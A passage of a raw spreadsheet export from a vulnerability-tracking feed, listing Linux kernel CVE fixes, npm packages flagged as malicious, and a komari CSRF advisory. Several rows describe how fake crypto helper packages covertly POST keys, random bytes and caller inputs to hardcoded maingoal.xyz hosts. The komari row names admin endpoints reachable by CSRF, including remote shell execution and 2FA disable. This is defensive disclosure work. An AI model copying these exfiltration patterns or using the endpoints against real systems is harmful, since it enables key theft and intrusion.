crypto: qcom-rng - Allow zero as a random number
Zero is a valid random number and needs to be allowed.  Otherwise the
output is distinguishable from random.</t>
        </is>
      </c>
      <c r="S1306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80922</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80923</t>
        </is>
      </c>
      <c r="D1307" s="5" t="inlineStr"/>
      <c r="E1307" s="5" t="inlineStr"/>
      <c r="F1307" s="5" t="inlineStr"/>
      <c r="G1307" s="5" t="inlineStr"/>
      <c r="H1307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1307" s="5" t="inlineStr"/>
      <c r="J1307" s="5" t="inlineStr"/>
      <c r="K1307" s="5" t="inlineStr"/>
      <c r="L1307" s="5" t="inlineStr"/>
      <c r="M1307" s="5" t="inlineStr"/>
      <c r="N1307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1307" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1307" s="5" t="inlineStr"/>
      <c r="Q1307" s="5" t="inlineStr"/>
      <c r="R1307" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xhci: dbgtty: Fix unregister on tty_register_driver() failure
If tty_register_driver() fails, it drops the reference, but fails to set
the global dbc_tty_driver to NULL, causing the unregister to be called
again when module exits.
On module unload dbc_tty_exit() only gates its cleanup on the driver
pointer being non-NULL, so it operates on the already-freed driver:
    module_init(xhci_hcd_init)
      xhci_hcd_init()
        xhci_dbc_init()                       [return value ignored]
          dbc_tty_init()
            tty_register_driver() fails
              tty_driver_kref_put()           -&gt; driver freed
              (dbc_tty_driver left dangling)
    ...
    module_exit(xhci_hcd_fini)
      xhci_hcd_fini()
        xhci_dbc_exit()
          dbc_tty_exit()
            if (dbc_tty_driver)               -&gt; true (dangling)
              tty_unregister_driver()         -&gt; use-after-free</t>
        </is>
      </c>
      <c r="S1307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80923</t>
        </is>
      </c>
    </row>
    <row r="1308">
      <c r="A1308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80925</t>
        </is>
      </c>
      <c r="D1308" s="5" t="inlineStr"/>
      <c r="E1308" s="5" t="inlineStr"/>
      <c r="F1308" s="5" t="inlineStr"/>
      <c r="G1308" s="5" t="inlineStr"/>
      <c r="H1308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1308" s="5" t="inlineStr"/>
      <c r="J1308" s="5" t="inlineStr"/>
      <c r="K1308" s="5" t="inlineStr"/>
      <c r="L1308" s="5" t="inlineStr"/>
      <c r="M1308" s="5" t="inlineStr"/>
      <c r="N1308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1308" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1308" s="5" t="inlineStr"/>
      <c r="Q1308" s="5" t="inlineStr"/>
      <c r="R1308" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vlan: fix skb_under_panic and races when toggling HW VLAN offload
Toggling hardware VLAN TX offload (NETIF_F_HW_VLAN_CTAG_TX or
NETIF_F_HW_VLAN_STAG_TX) on a lower device invokes vlan_transfer_features(),
which dynamically changed vlandev-&gt;hard_header_len.
This causes two issues:
1. Lockless TX paths (e.g. packet_snd in af_packet.c, ip6_finish_output2)
   read dev-&gt;hard_header_len without holding RTNL lock. Mutating
   hard_header_len dynamically under RTNL creates a data race where upper
   layers reserve insufficient headroom based on a stale hard_header_len,
   resulting in skb_under_panic when vlan_dev_hard_header() is called.
2. In addition, vlan_transfer_features() updated hard_header_len without
   updating header_ops, causing a mismatch between allocated headroom
   and header creation.
Always setting dev-&gt;hard_header_len = real_dev-&gt;hard_header_len and
dev-&gt;needed_headroom = real_dev-&gt;needed_headroom + VLAN_HLEN unconditionally
ensures:
- dev-&gt;hard_header_len remains 100% static and immutable at real_dev-&gt;hard_header_len,
  eliminating all dynamic runtime updates and data races on hard_header_len.
- Upper layers allocating skbs via LL_RESERVED_SPACE() will always reserve
  sufficient headroom for software VLAN tag insertion (real_dev-&gt;hard_header_len +
  real_dev-&gt;needed_headroom + VLAN_HLEN).
- vlandev inherits real_dev-&gt;needed_tailroom so underlying trailer/padding/ICV
  requirements are honored.
- AF_PACKET SOCK_RAW network header offsets remain correctly aligned at
  real_dev-&gt;hard_header_len.
- vlan_header_ops is used unconditionally.
Note to stable teams: Make sure to backport these commits:
e16e960d55a4 ("ipvlan: inherit needed_headroom and needed_tailroom from phy_dev")
cef51860becd ("macvlan: inherit needed_headroom and needed_tailroom from lowerdev")</t>
        </is>
      </c>
      <c r="S1308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80925</t>
        </is>
      </c>
    </row>
    <row r="1309">
      <c r="A1309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1309" s="5" t="inlineStr">
        <is>
          <t>GHSA-2r37-886p-hj65</t>
        </is>
      </c>
      <c r="D1309" s="5" t="inlineStr"/>
      <c r="E1309" s="5" t="inlineStr"/>
      <c r="F1309" s="5" t="inlineStr"/>
      <c r="G1309" s="5" t="inlineStr"/>
      <c r="H1309" s="5" t="inlineStr"/>
      <c r="I1309" s="5" t="inlineStr"/>
      <c r="J1309" s="5" t="inlineStr"/>
      <c r="K1309" s="5" t="inlineStr"/>
      <c r="L1309" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/ui-kit</t>
        </is>
      </c>
      <c r="M1309" s="5" t="inlineStr"/>
      <c r="N1309" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1309" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1309" s="5" t="inlineStr"/>
      <c r="Q1309" s="5" t="inlineStr"/>
      <c r="R1309" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (ef7c357cfafdf0f52aebd8a04514c35bb7a77a0684c8b35fb22d16fb0d16912f)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09" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16109</t>
        </is>
      </c>
    </row>
    <row r="1310">
      <c r="A1310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1310" s="5" t="inlineStr">
        <is>
          <t>GHSA-2r8h-5pr4-fr3v</t>
        </is>
      </c>
      <c r="D1310" s="5" t="inlineStr"/>
      <c r="E1310" s="5" t="inlineStr"/>
      <c r="F1310" s="5" t="inlineStr"/>
      <c r="G1310" s="5" t="inlineStr"/>
      <c r="H1310" s="5" t="inlineStr"/>
      <c r="I1310" s="5" t="inlineStr"/>
      <c r="J1310" s="5" t="inlineStr"/>
      <c r="K1310" s="5" t="inlineStr"/>
      <c r="L1310" s="5" t="inlineStr">
        <is>
          <t>npm:sams-run-style</t>
        </is>
      </c>
      <c r="M1310" s="5" t="inlineStr"/>
      <c r="N1310" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1310" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1310" s="5" t="inlineStr"/>
      <c r="Q1310" s="5" t="inlineStr"/>
      <c r="R1310" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (14b995469abba673b875788358966c5468456f0a911b1f6e3b5ee95c8f14afb1)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10" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16090</t>
        </is>
      </c>
    </row>
    <row r="1311">
      <c r="A1311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1311" s="5" t="inlineStr">
        <is>
          <t>GHSA-369v-phqf-c9g9</t>
        </is>
      </c>
      <c r="D1311" s="5" t="inlineStr"/>
      <c r="E1311" s="5" t="inlineStr"/>
      <c r="F1311" s="5" t="inlineStr"/>
      <c r="G1311" s="5" t="inlineStr"/>
      <c r="H1311" s="5" t="inlineStr"/>
      <c r="I1311" s="5" t="inlineStr"/>
      <c r="J1311" s="5" t="inlineStr"/>
      <c r="K1311" s="5" t="inlineStr"/>
      <c r="L1311" s="5" t="inlineStr">
        <is>
          <t>npm:@vnxsync/libsignal-node</t>
        </is>
      </c>
      <c r="M1311" s="5" t="inlineStr"/>
      <c r="N1311" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1311" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1311" s="5" t="inlineStr"/>
      <c r="Q1311" s="5" t="inlineStr"/>
      <c r="R1311" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c34a09a0ca8e45d167ab7b26e0b1882a8e2cabffc64495637e884258b3ea57ce)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11" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16083</t>
        </is>
      </c>
    </row>
    <row r="1312">
      <c r="A1312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1312" s="5" t="inlineStr">
        <is>
          <t>GHSA-4crw-26f5-4v62</t>
        </is>
      </c>
      <c r="D1312" s="5" t="inlineStr"/>
      <c r="E1312" s="5" t="inlineStr"/>
      <c r="F1312" s="5" t="inlineStr"/>
      <c r="G1312" s="5" t="inlineStr"/>
      <c r="H1312" s="5" t="inlineStr"/>
      <c r="I1312" s="5" t="inlineStr"/>
      <c r="J1312" s="5" t="inlineStr"/>
      <c r="K1312" s="5" t="inlineStr"/>
      <c r="L1312" s="5" t="inlineStr">
        <is>
          <t>npm:amprem-activator</t>
        </is>
      </c>
      <c r="M1312" s="5" t="inlineStr"/>
      <c r="N1312" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1312" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1312" s="5" t="inlineStr"/>
      <c r="Q1312" s="5" t="inlineStr"/>
      <c r="R1312" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2bb73ef0a9130c0751f253465a40f102cddb6cecdec2835dd7cc9c0f4150efa1)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (3a27a369a049a2e8c6afcd41be97b49ae003a69f8a596cfc0398cb5cc9561a89)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12" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16084</t>
        </is>
      </c>
    </row>
    <row r="1313">
      <c r="A1313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1313" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1313" s="5" t="inlineStr">
        <is>
          <t>GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
      <c r="D1313" s="5" t="inlineStr"/>
      <c r="E1313" s="5" t="inlineStr"/>
      <c r="F1313" s="5" t="inlineStr"/>
      <c r="G1313" s="5" t="inlineStr"/>
      <c r="H1313" s="5" t="inlineStr"/>
      <c r="I1313" s="5" t="inlineStr"/>
      <c r="J1313" s="5" t="inlineStr"/>
      <c r="K1313" s="5" t="inlineStr"/>
      <c r="L1313" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M1313" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N1313" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1313" s="5" t="inlineStr"/>
      <c r="P1313" s="5" t="inlineStr"/>
      <c r="Q1313" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1313" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S1313" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
    </row>
    <row r="1314">
      <c r="A1314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1314" s="5" t="inlineStr">
        <is>
          <t>GHSA-4x79-pcqv-r9rf</t>
        </is>
      </c>
      <c r="D1314" s="5" t="inlineStr"/>
      <c r="E1314" s="5" t="inlineStr"/>
      <c r="F1314" s="5" t="inlineStr"/>
      <c r="G1314" s="5" t="inlineStr"/>
      <c r="H1314" s="5" t="inlineStr"/>
      <c r="I1314" s="5" t="inlineStr"/>
      <c r="J1314" s="5" t="inlineStr"/>
      <c r="K1314" s="5" t="inlineStr"/>
      <c r="L1314" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/reporting-system</t>
        </is>
      </c>
      <c r="M1314" s="5" t="inlineStr"/>
      <c r="N1314" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1314" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1314" s="5" t="inlineStr"/>
      <c r="Q1314" s="5" t="inlineStr"/>
      <c r="R1314" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (9a41fe4ef01818c699bc5c1953702b37cb566a58b0b4769a7ae532b05699b130)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14" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16108</t>
        </is>
      </c>
    </row>
    <row r="1315">
      <c r="A1315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1315" s="5" t="inlineStr">
        <is>
          <t>GHSA-5qr5-f8q7-r844</t>
        </is>
      </c>
      <c r="D1315" s="5" t="inlineStr"/>
      <c r="E1315" s="5" t="inlineStr"/>
      <c r="F1315" s="5" t="inlineStr"/>
      <c r="G1315" s="5" t="inlineStr"/>
      <c r="H1315" s="5" t="inlineStr"/>
      <c r="I1315" s="5" t="inlineStr"/>
      <c r="J1315" s="5" t="inlineStr"/>
      <c r="K1315" s="5" t="inlineStr"/>
      <c r="L1315" s="5" t="inlineStr">
        <is>
          <t>npm:pumpswap-sdk-v1</t>
        </is>
      </c>
      <c r="M1315" s="5" t="inlineStr"/>
      <c r="N1315" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1315" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1315" s="5" t="inlineStr"/>
      <c r="Q1315" s="5" t="inlineStr"/>
      <c r="R1315" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">pumpswap-sdk-v1@0.0.1 presents crypto helpers for the PumpSwap SDK, but validate(input) base64-encodes its argument and POSTs it to https://pumpswap-sdk.maingoal.xyz/v1/check through check_validator() in dist/index.js, and randomBytes(size) forwards the hex output of crypto.randomBytes to the same host before returning it. Nothing runs on install or import; the send happens on the first call. The bundled pumpswap-sdk.rar holds a copy of the same source. Same publisher (luisdary) as raydium-clmm-sdk, crypto-validates and polygon-toolkits-validator.
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (542bdf00bacaa82bf9fea14d555598448a7bbff0f9514b2dd780be9e6d000c2a)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15" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16088</t>
        </is>
      </c>
    </row>
    <row r="1316">
      <c r="A1316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1316" s="5" t="inlineStr">
        <is>
          <t>GHSA-c74p-4c5p-6v9r</t>
        </is>
      </c>
      <c r="D1316" s="5" t="inlineStr"/>
      <c r="E1316" s="5" t="inlineStr"/>
      <c r="F1316" s="5" t="inlineStr"/>
      <c r="G1316" s="5" t="inlineStr"/>
      <c r="H1316" s="5" t="inlineStr"/>
      <c r="I1316" s="5" t="inlineStr"/>
      <c r="J1316" s="5" t="inlineStr"/>
      <c r="K1316" s="5" t="inlineStr"/>
      <c r="L1316" s="5" t="inlineStr">
        <is>
          <t>npm:@convertics/script</t>
        </is>
      </c>
      <c r="M1316" s="5" t="inlineStr"/>
      <c r="N1316" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1316" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1316" s="5" t="inlineStr"/>
      <c r="Q1316" s="5" t="inlineStr"/>
      <c r="R1316" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c37417c930b89008560cef36221b6b5abf86f4d84bf6c061f93858b395c81eb4)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16" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16110</t>
        </is>
      </c>
    </row>
    <row r="1317">
      <c r="A1317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1317" s="5" t="inlineStr">
        <is>
          <t>GHSA-cmwm-j5px-xrpf</t>
        </is>
      </c>
      <c r="D1317" s="5" t="inlineStr"/>
      <c r="E1317" s="5" t="inlineStr"/>
      <c r="F1317" s="5" t="inlineStr"/>
      <c r="G1317" s="5" t="inlineStr"/>
      <c r="H1317" s="5" t="inlineStr"/>
      <c r="I1317" s="5" t="inlineStr"/>
      <c r="J1317" s="5" t="inlineStr"/>
      <c r="K1317" s="5" t="inlineStr"/>
      <c r="L1317" s="5" t="inlineStr">
        <is>
          <t>npm:polygon-toolkits-validator</t>
        </is>
      </c>
      <c r="M1317" s="5" t="inlineStr"/>
      <c r="N1317" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1317" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1317" s="5" t="inlineStr"/>
      <c r="Q1317" s="5" t="inlineStr"/>
      <c r="R1317" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">polygon-toolkits-validator@1.1.4 exports Node crypto helper wrappers, but validate(input) base64-encodes its argument and POSTs it to https://raydium-clmm.maingoal.xyz/v1/check as {action: "validator", content: btoa(input)} through check_validator() in dist/index.js, then returns true without validating anything, and randomBytes(size) forwards the hex output of crypto.randomBytes to the same host before returning it, so any key or nonce generated through it is disclosed at creation. Nothing runs on install or import; the send happens on the first call to either export. dist/index.js is the same file as crypto-validates@0.0.2 from the same npm account (luisdary), which also published raydium-clmm-sdk and pumpswap-sdk-v1 with the same function against *.maingoal.xyz. The check_validator shape matches MAL-2026-4642, MAL-2026-10640 and MAL-2026-10641, which used other hosts.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (247ced1b39382952aa5c665774c77a1c321b80b13d29f7118e938d85ef720c23)
The package ships only a minified dist bundle that re-exports familiar node:crypto names (createCipheriv, createDecipheriv, createPrivateKey, randomBytes, checkPrime, scrypt), presenting itself as a drop-in crypto shim. Two exported paths covertly transmit sensitive data to a hardcoded remote host: randomBytes(n) generates bytes via crypto.randomBytes(n).toString('hex') and then passes the hex string to an internal check_validator() before returning it, and the exported validate() likewise passes its caller-supplied argument to check_validator(). check_validator() POSTs the value, base64-encoded, to https://raydium-clmm.maingoal.xyz/v1/check with body {action:"validator",content:btoa(e)}. The destination is hardcoded, not caller-configurable, and unrelated to the declared 'Polygon toolkits validator' purpose. Callers use randomBytes for keys, IVs, nonces, and seeds, and pass sensitive strings (private keys, mnemonics, transaction payloads) to validate(); those values are transmitted to the operator on every call, enabling reproduction of derived keys/nonces and disclosure of caller inputs.
## Source: ghsa-malware (6c6493dc8ede3bc3d88353d577d82ca96073206d90f776147fe050a3b61bda64)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17" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16087</t>
        </is>
      </c>
    </row>
    <row r="1318">
      <c r="A1318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1318" s="5" t="inlineStr">
        <is>
          <t>GHSA-cq4p-x9wg-m5wv</t>
        </is>
      </c>
      <c r="D1318" s="5" t="inlineStr"/>
      <c r="E1318" s="5" t="inlineStr"/>
      <c r="F1318" s="5" t="inlineStr"/>
      <c r="G1318" s="5" t="inlineStr"/>
      <c r="H1318" s="5" t="inlineStr"/>
      <c r="I1318" s="5" t="inlineStr"/>
      <c r="J1318" s="5" t="inlineStr"/>
      <c r="K1318" s="5" t="inlineStr"/>
      <c r="L1318" s="5" t="inlineStr">
        <is>
          <t>npm:raydium-clmm-sdk</t>
        </is>
      </c>
      <c r="M1318" s="5" t="inlineStr"/>
      <c r="N1318" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1318" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1318" s="5" t="inlineStr"/>
      <c r="Q1318" s="5" t="inlineStr"/>
      <c r="R1318" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">raydium-clmm-sdk 0.0.1 and 0.0.2 (identical dist/index.js) present crypto helpers for the Raydium CLMM, but initKeypair(content) base64-encodes its argument and POSTs it to https://raydium-clmm.maingoal.xyz/v1/check through check_validator(), and randomBytes(size) forwards the hex output of crypto.randomBytes to the same host before returning it. Nothing runs on install or import; data leaves on the first call to either export. The README claims the package contains only type definitions. Same publisher (luisdary) and host as crypto-validates and polygon-toolkits-validator.
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (0db01a66db01ac1e51b8171b417c65e6fe86cc542a453d4a495e0238ca137f5d)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18" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16089</t>
        </is>
      </c>
    </row>
    <row r="1319">
      <c r="A1319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1319" s="5" t="inlineStr">
        <is>
          <t>GHSA-fw7g-gr3j-7wf7</t>
        </is>
      </c>
      <c r="D1319" s="5" t="inlineStr"/>
      <c r="E1319" s="5" t="inlineStr"/>
      <c r="F1319" s="5" t="inlineStr"/>
      <c r="G1319" s="5" t="inlineStr"/>
      <c r="H1319" s="5" t="inlineStr"/>
      <c r="I1319" s="5" t="inlineStr"/>
      <c r="J1319" s="5" t="inlineStr"/>
      <c r="K1319" s="5" t="inlineStr"/>
      <c r="L1319" s="5" t="inlineStr">
        <is>
          <t>npm:@versacode/baileys</t>
        </is>
      </c>
      <c r="M1319" s="5" t="inlineStr"/>
      <c r="N1319" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1319" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1319" s="5" t="inlineStr"/>
      <c r="Q1319" s="5" t="inlineStr"/>
      <c r="R1319" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4fb56d60eb9a1df8a4b6dc87789234366b8431047ca01dbce807af874778ffa8)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (d96eff1b72c222420b10f758b5fb58d4a518c72e8c370367877db6ed0a88dda5)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19" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16068</t>
        </is>
      </c>
    </row>
    <row r="1320">
      <c r="A1320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1320" s="5" t="inlineStr">
        <is>
          <t>GHSA-gg93-mm5f-23v8</t>
        </is>
      </c>
      <c r="D1320" s="5" t="inlineStr"/>
      <c r="E1320" s="5" t="inlineStr"/>
      <c r="F1320" s="5" t="inlineStr"/>
      <c r="G1320" s="5" t="inlineStr"/>
      <c r="H1320" s="5" t="inlineStr"/>
      <c r="I1320" s="5" t="inlineStr"/>
      <c r="J1320" s="5" t="inlineStr"/>
      <c r="K1320" s="5" t="inlineStr"/>
      <c r="L1320" s="5" t="inlineStr">
        <is>
          <t>npm:@vallensofficial/baileys</t>
        </is>
      </c>
      <c r="M1320" s="5" t="inlineStr"/>
      <c r="N1320" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1320" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1320" s="5" t="inlineStr"/>
      <c r="Q1320" s="5" t="inlineStr"/>
      <c r="R1320" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02adc12975b9798883d78640d5cab1a73420818d23fbd192ebb76a384f056d54)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (03e59bf62f2166c346075fbb0b61864404a5a27e9a3d0ae3d57c75da79120ccb)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20" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16067</t>
        </is>
      </c>
    </row>
    <row r="1321">
      <c r="A1321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1321" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1321" s="5" t="inlineStr">
        <is>
          <t>GHSA-hxjg-93wc-h8p8</t>
        </is>
      </c>
      <c r="D1321" s="5" t="inlineStr"/>
      <c r="E1321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1321" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1321" s="5" t="inlineStr"/>
      <c r="H1321" s="5" t="inlineStr"/>
      <c r="I1321" s="5" t="inlineStr"/>
      <c r="J1321" s="5" t="inlineStr"/>
      <c r="K1321" s="5" t="inlineStr"/>
      <c r="L1321" s="5" t="inlineStr">
        <is>
          <t>go:github.com/komari-monitor/komari</t>
        </is>
      </c>
      <c r="M1321" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260609084633-98122fa4d110</t>
        </is>
      </c>
      <c r="N1321" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1321" s="5" t="inlineStr"/>
      <c r="P1321" s="5" t="inlineStr"/>
      <c r="Q1321" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1321" s="5" t="inlineStr">
        <is>
          <t># Vulnerability Overview
The `session_token` cookie is set **without** the `SameSite` or `Secure` attributes (`login.go:68`).
All `/api/admin/` management endpoints rely solely on this cookie for authentication, with **no CSRF token or Origin validation**.
**The server-side vulnerability is confirmed to exist; however, exploitation via cross-site requests is mitigated in modern browsers by the default `SameSite=Lax` behavior.**
## Root Cause
```go
// komari-main/api/public/login.go:68
c.SetCookie("session_token", session, 2592000, "/", "", false, true)
//   Secure=false, SameSite not explicitly set
//   Admin route group (server.go:213-343) has no CSRF middleware
```
Gin's `ShouldBindJSON` does not strictly validate the `Content-Type` header, allowing `text/plain` requests to bypass CORS preflight.
## Browser Limitations
- Chrome 80+ (Feb 2020), Firefox 103+ (Jul 2022), and Safari all default unspecified cookies to `SameSite=Lax`.
- Cookies without an explicit `SameSite` attribute **are not included in cross-site POST requests**.
- As a result, the server receives requests without the session cookie and returns **HTTP 401 Unauthorized**.
| Scenario | Exploitable |
|----------|-------------|
| Cross-site HTML (modern browsers) | ✗ Blocked by `SameSite=Lax` |
| Cross-site HTML (Chrome &lt;80 / legacy browsers) | ✓ |
| Same-origin context (Browser Console / existing XSS) | ✓ |
| Man-in-the-middle over HTTP (`Secure=false`) | ✓ |
## High-Impact Operations Reachable via CSRF
| Endpoint | Method | Impact |
|----------|--------|--------|
| `/api/admin/task/exec` | POST | Execute arbitrary shell commands on managed nodes |
| `/api/admin/2fa/disable` | POST | Disable administrator two-factor authentication |
